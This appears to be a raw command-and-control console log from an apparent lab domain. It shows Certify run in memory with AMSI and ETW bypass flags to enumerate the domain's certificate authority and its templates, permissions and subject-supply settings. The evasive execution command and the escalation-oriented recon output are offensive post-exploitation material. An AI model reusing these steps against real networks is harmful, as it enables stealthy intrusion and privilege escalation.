[09/16 17:06:27] beacon> inlineExecute-Assembly --dotnetassembly C:\Tools\Certify\Certify\bin\Release\Certify.exe --assemblyargs find /vulnerable; m --amsi --etw --appdomain SharedDomain --pipe dotnet-diagnostic-1337 [09/16 17:06:27] [*] Running inlineExecute-Assembly by (@anthemtotheego) [09/16 17:06:27] [+] host called home, sent: 190223 bytes [09/16 17:06:28] [+] received output: _____ _ _ __ / ____| | | (_)/ _| | | ___ _ __| |_ _| |_ _ _ | | / _ \ '__| __| | _| | | | | |___| __/ | | |_| | | | |_| | \_____\___|_| \__|_|_| \__, | __/ | |___./ v1.1.0 [*] Action: Find certificate templates [*] Using the search base 'CN=Configuration,DC=acme,DC=corp' [*] Listing info about the Enterprise CA 'ACME Root CA' Enterprise CA Name : ACME Root CA DNS Hostname : ca.acme.corp FullName : ca.acme.corp\ACME Root CA Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED Cert SubjectName : CN=ACME Root CA, DC=acme, DC=corp Cert Thumbprint : 0A0FCDCDAC151B7ADB4AE01E485357BD8E3F952E Cert Serial : 18997EB5DD7530A449695B483F3C22EF Cert Start Date : 7/5/2023 11:22:25 AM Cert End Date : 7/5/2048 11:32:25 AM Cert Chain : CN=ACMERootCA,DC=acme,DC=corp UserSpecifiedSAN : Disabled CA Permissions : Owner: BUILTIN\Administrators S-1-5-32-544 Access Rights Principal Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11 Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544 Allow ManageCA, ManageCertificates ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 Allow ManageCA, ManageCertificates ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 Enrollment Agent Restrictions : None [*] Available Certificates Templates : CA Name : ca.acme.corp\ACME Root CA Template Name : EFS Schema Version : 1 Validity Period : 1 year Renewal Period : 6 weeks msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT Authorized Signatures Required : 0 pkiextendedkeyusage : Encrypting File System mspki-certificate-application-policy : Permissions Enrollment Permissions Enrollment Rights : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Domain Users S-1-5-21-3423824952-2951782317-1884926318-513 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 Object Control Permissions Owner : ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteOwner Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteDacl Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteProperty Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 CA Name : ca.acme.corp\ACME Root CA Template Name : Administrator Schema Version : 1 Validity Period : 1 year Renewal Period : 6 weeks msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT Authorized Signatures Required : 0 pkiextendedkeyusage : Client Authentication, Encrypting File System, Microsoft Trust List Signing, Secure Email mspki-certificate-application-policy : Permissions Enrollment Permissions Enrollment Rights : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 Object Control Permissions Owner : ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteOwner Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteDacl Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteProperty Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 CA Name : ca.acme.corp\ACME Root CA Template Name : EFSRecovery Schema Version : 1 Validity Period : 5 years Renewal Period : 6 weeks msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT Authorized Signatures Required : 0 pkiextendedkeyusage : File Recovery mspki-certificate-application-policy : Permissions Enrollment Permissions Enrollment Rights : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 Object Control Permissions Owner : ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteOwner Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteDacl Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteProperty Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 CA Name : ca.acme.corp\ACME Root CA Template Name : DomainController Schema Version : 1 Validity Period : 1 year Renewal Period : 6 weeks msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT Authorized Signatures Required : 0 pkiextendedkeyusage : Client Authentication, Server Authentication mspki-certificate-application-policy : Permissions Enrollment Permissions Enrollment Rights : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Domain Controllers S-1-5-21-3423824952-2951782317-1884926318-516 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 ACME\Enterprise Read-only Domain ControllersS-1-5-21-3423824952-2951782317-1884926318-498 NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9 Object Control Permissions Owner : ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteOwner Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteDacl Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteProperty Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 CA Name : ca.acme.corp\ACME Root CA Template Name : WebServer Schema Version : 1 Validity Period : 2 years Renewal Period : 6 weeks msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT mspki-enrollment-flag : NONE Authorized Signatures Required : 0 pkiextendedkeyusage : Server Authentication mspki-certificate-application-policy : Permissions Enrollment Permissions Enrollment Rights : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 Object Control Permissions Owner : ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteOwner Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteDacl Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteProperty Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 CA Name : ca.acme.corp\ACME Root CA Template Name : SubCA Schema Version : 1 Validity Period : 5 years Renewal Period : 6 weeks msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT mspki-enrollment-flag : NONE Authorized Signatures Required : 0 pkiextendedkeyusage : mspki-certificate-application-policy : Permissions Enrollment Permissions Enrollment Rights : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 Object Control Permissions Owner : ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteOwner Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteDacl Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteProperty Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 CA Name : ca.acme.corp\ACME Root CA Template Name : DomainControllerAuthentication Schema Version : 2 Validity Period : 1 year Renewal Period : 6 weeks msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS mspki-enrollment-flag : AUTO_ENROLLMENT Authorized Signatures Required : 0 pkiextendedkeyusage : Client Authentication, Server Authentication, Smart Card Logon mspki-certificate-application-policy : Client Authentication, Server Authentication, Smart Card Logon Permissions Enrollment Permissions Enrollment Rights : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Domain Controllers S-1-5-21-3423824952-2951782317-1884926318-516 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 ACME\Enterprise Read-only Domain ControllersS-1-5-21-3423824952-2951782317-1884926318-498 NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9 Object Control Permissions Owner : ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteOwner Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteDacl Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteProperty Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 CA Name : ca.acme.corp\ACME Root CA Template Name : DirectoryEmailReplication Schema Version : 2 Validity Period : 1 year Renewal Period : 6 weeks msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT Authorized Signatures Required : 0 pkiextendedkeyusage : Directory Service Email Replication mspki-certificate-application-policy : Directory Service Email Replication Permissions Enrollment Permissions Enrollment Rights : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Domain Controllers S-1-5-21-3423824952-2951782317-1884926318-516 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 ACME\Enterprise Read-only Domain ControllersS-1-5-21-3423824952-2951782317-1884926318-498 NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9 Object Control Permissions Owner : ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteOwner Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteDacl Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteProperty Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 CA Name : ca.acme.corp\ACME Root CA Template Name : KerberosAuthentication Schema Version : 2 Validity Period : 1 year Renewal Period : 6 weeks msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS mspki-enrollment-flag : AUTO_ENROLLMENT Authorized Signatures Required : 0 pkiextendedkeyusage : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon mspki-certificate-application-policy : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon Permissions Enrollment Permissions Enrollment Rights : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Domain Controllers S-1-5-21-3423824952-2951782317-1884926318-516 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 ACME\Enterprise Read-only Domain ControllersS-1-5-21-3423824952-2951782317-1884926318-498 NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9 Object Control Permissions Owner : ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteOwner Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteDacl Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteProperty Principals : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 CA Name : ca.acme.corp\ACME Root CA Template Name : ACMEComputer Schema Version : 2 Validity Period : 1 year Renewal Period : 6 weeks msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS mspki-enrollment-flag : AUTO_ENROLLMENT Authorized Signatures Required : 0 pkiextendedkeyusage : Client Authentication, Server Authentication mspki-certificate-application-policy : Client Authentication, Server Authentication Permissions Enrollment Permissions Enrollment Rights : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Domain Computers S-1-5-21-3423824952-2951782317-1884926318-515 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 Object Control Permissions Owner : ACME\Administrator S-1-5-21-3423824952-2951782317-1884926318-500 WriteOwner Principals : ACME\Administrator S-1-5-21-3423824952-2951782317-1884926318-500 ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteDacl Principals : ACME\Administrator S-1-5-21-3423824952-2951782317-1884926318-500 ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteProperty Principals : ACME\Administrator S-1-5-21-3423824952-2951782317-1884926318-500 ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 CA Name : ca.acme.corp\ACME Root CA Template Name : ACMEUser Schema Version : 2 Validity Period : 1 year Renewal Period : 6 weeks msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT Authorized Signatures Required : 0 pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email Permissions Enrollment Permissions Enrollment Rights : ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Domain Users S-1-5-21-3423824952-2951782317-1884926318-513 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 Object Control Permissions Owner : ACME\Administrator S-1-5-21-3423824952-2951782317-1884926318-500 WriteOwner Principals : ACME\Administrator S-1-5-21-3423824952-2951782317-1884926318-500 ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteDacl Principals : ACME\Administrator S-1-5-21-3423824952-2951782317-1884926318-500 ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 WriteProperty Principals : ACME\Administrator S-1-5-21-3423824952-2951782317-1884926318-500 ACME\Domain Admins S-1-5-21-3423824952-2951782317-1884926318-512 ACME\Enterprise Admins S-1-5-21-3423824952-2951782317-1884926318-519 Certify completed in 00:00:00.8463062 [09/16 17:06:28] [+] received output: [+] inlineExecute-Assembly Finished